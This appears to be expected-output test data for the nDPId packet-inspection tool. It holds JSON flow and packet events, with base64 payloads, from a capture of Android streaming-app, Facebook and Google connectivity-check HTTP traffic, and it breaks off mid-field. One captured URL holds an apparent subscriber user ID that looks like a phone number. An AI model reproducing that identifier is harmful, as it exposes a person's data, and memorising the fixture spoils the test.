+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7560000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1429000031075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":358,"pkt_l4_len":322,"thread_ts_msec":1429000031075,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAVYEaUAAPwYE2wo2qfp4HAUSgSgAUG4ezi+GqNXzUBgAc8tUAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9ob21lP2FwaUtleT1xd2VydHkmZGV2aWNlPWFuZHJvaWRtb2JpbGUmbG9jYWxlPWVuZyZuZXR3b3JrPVdJRkkmcGFnZU51bWJlcj0xJnBhZ2VTaXplPTUwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiBhcGktc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7560000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/home?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1429000031382,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":109,"pkt_l4_len":73,"thread_ts_msec":1429000031382,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAF1lCkAArQY3FngcBRIKNqn6AFCBKIapX\/duHs9dUBgIImd7AAD+6U1rdHX+8GWHmWHKf1z0+O1Nfp++87\/dVNV0wP\/9v\/+n\/\/6\/AAAA\/\/8CDAD1QSSgppQFAA=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1429000031698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000031698,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOOYfEAAPwb2VQo2qfqt\/EoWzD0AUOQgUs9KX9ElUBgAc0k5AABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1429000032158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000032158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNiNkAArAa\/H638ShYKNqn6AFDMPUpf0SXkIFOKUBgIIjgwAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogK2R4S1lRRnpNRHhKdjZkUXFVLyt4Yzd1VXVxaHpOK3BWYXpxSzdCUmswUW1oSWIxVEp3YXZ4SDRpUUV1TUVFSDVZdU80TU11R3ErWHlyOGUveHZqV2c9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMiBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1429000037314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000037314,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAONYlEAAPwY2Pgo2qfqt\/EoWzEAAUKq8lHZkd0MeUBg5CHxNAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1429000037600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":241,"pkt_l4_len":205,"thread_ts_msec":1429000037600,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOEBz0AAPwbyFAo2qfp4HBrngf0AUJlyzTdc8IHSUBgAc3meAABHRVQgL2dlbmVyYXRlXzIwNCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogY2xpZW50czMuZ29vZ2xlLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients3.google.com","url":"clients3.google.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1429000037659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":137,"pkt_l4_len":101,"thread_ts_msec":1429000037659,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHlLmEAArQY6l3gcGucKNqn6AFCB\/VzwgdKZcs3wUBgIIqKRAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNClNlcnZlcjogR0ZFLzIuMA0KDQo="} +00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1429000037771,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000037771,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUMgAkAArQYAVK38ShYKNqn6AFDMQGR3Qx6qvJUxUBj\/\/2USAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogSENQcUMxYW5HZGxXZUVqMEIwU3F1MHVIQzU2N3BTRzJERlZvSXdHYmRXNFovN1dydjVhM0ZQZEY5V1FIMDUrNFREZVFXV3FiZjA4djA4c1RURE81VWc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} +00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1429000039509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":365,"pkt_l4_len":329,"thread_ts_msec":1429000039509,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAV1DA0AAPwaoIgo2qfp4HCMpxewAUEHDig\/6xw2tUBgAhzcPAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3ZpZXMvNjI0MT9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} +01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1429000039809,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":476,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":476,"pkt_l4_len":440,"thread_ts_msec":1429000039809,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAcw50kAAPwaw5Ao2qfp4HCMpxe0AUOei9TYRmPaxUBgAh2m5AABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3JlTGlrZVRoaXM\/YXBpS2V5PXF3ZXJ0eSZjb250ZW50UmF0aW5nPTIwJmRldmljZT1hbmRyb2lkbW9iaWxlJmdlbnJlPSUyOFRocmlsbGVyK0FjdGlvbkFkdmVudHVyZSslMjkmbGFuZ3VhZ2U9JTI4ZW5nKyUyOSZsb2NhbGU9ZW5nJm5ldHdvcms9V0lGSSZwYWdlTnVtYmVyPTEmcGFnZVNpemU9NTAmcmVzb3VyY2VJZD02MjQxJnJlc291cmNlVHlwZT1tb3ZpZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7560000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1429000041481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":237,"pkt_l4_len":201,"thread_ts_msec":1429000041481,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAN24s0AAQAZp+Qo2qfofDUQxrvkAUHO25ZtSV776UBgBtoUeAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC4yOyBHVC1JOTUwNSBCdWlsZC9LT1Q0OUgpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} +00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7560000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; GT-I9505 Build\/KOT49H)"}} +00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1429000041819,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000041819,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNnpEAArQZNhh8NRDEKNqn6AFCu+VJXvvpztuZQUBgIIrdJAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogajRyR1VwRDFrR0J2VWIvajBNRVhMMnlyRzg0NlVLcDBDV2hLNFFWcTB4K0hLUDR5UVIxR09sVWtXUFkvRGJKNnNKU1pTSWdIdGF1L04xQjF2cTNteXc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoyMSBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7560000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1429000048159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048159,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGUAAPwYfWgo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"} +01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7560000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"play-singtelhawk.quickplay.com","url":"play-singtelhawk.quickplay.com\/vstb\/playlist_5_6241_357.m3u8?action=145&appId=5006&carrierId=23&appVersion=1.0&contentId=6241&contentTypeId=3&deviceName=androidmobile&encodingId=357&drmId=4&drmVersion=1.5&delivery=5&prefLanguage=eng&webvtt=true&userid=09154974536&vstbtype=streaming","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1429000048647,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048647,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGkAAPwYfWQo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"} +02025{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1429000048795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1225,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1225,"pkt_l4_len":1189,"thread_ts_msec":1429000048795,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBLkvDEAArAZpoXgcBSkKNqn6AFCs4GOH5p5v7TnpUBj\/\/xfxAABfMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfU1RWMjBSMTkyLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9NDQ1MmM4NzAxMzM0YjUwMzg1ZGQxMjA0N2RjZjY2NmIKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD0zNTgwOTMKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWMjUwUjI0MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFYyNTBSMjQwLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9YTVjNmMyY2MzYjk1Y2FiMzhkN2Y2NzgxMWQzOWZkZmEKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD00NTMyNjEKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvVFZYVjMyMFIyNDAvcXBtZXp6LUhhd2tfRGlnaXRhbF9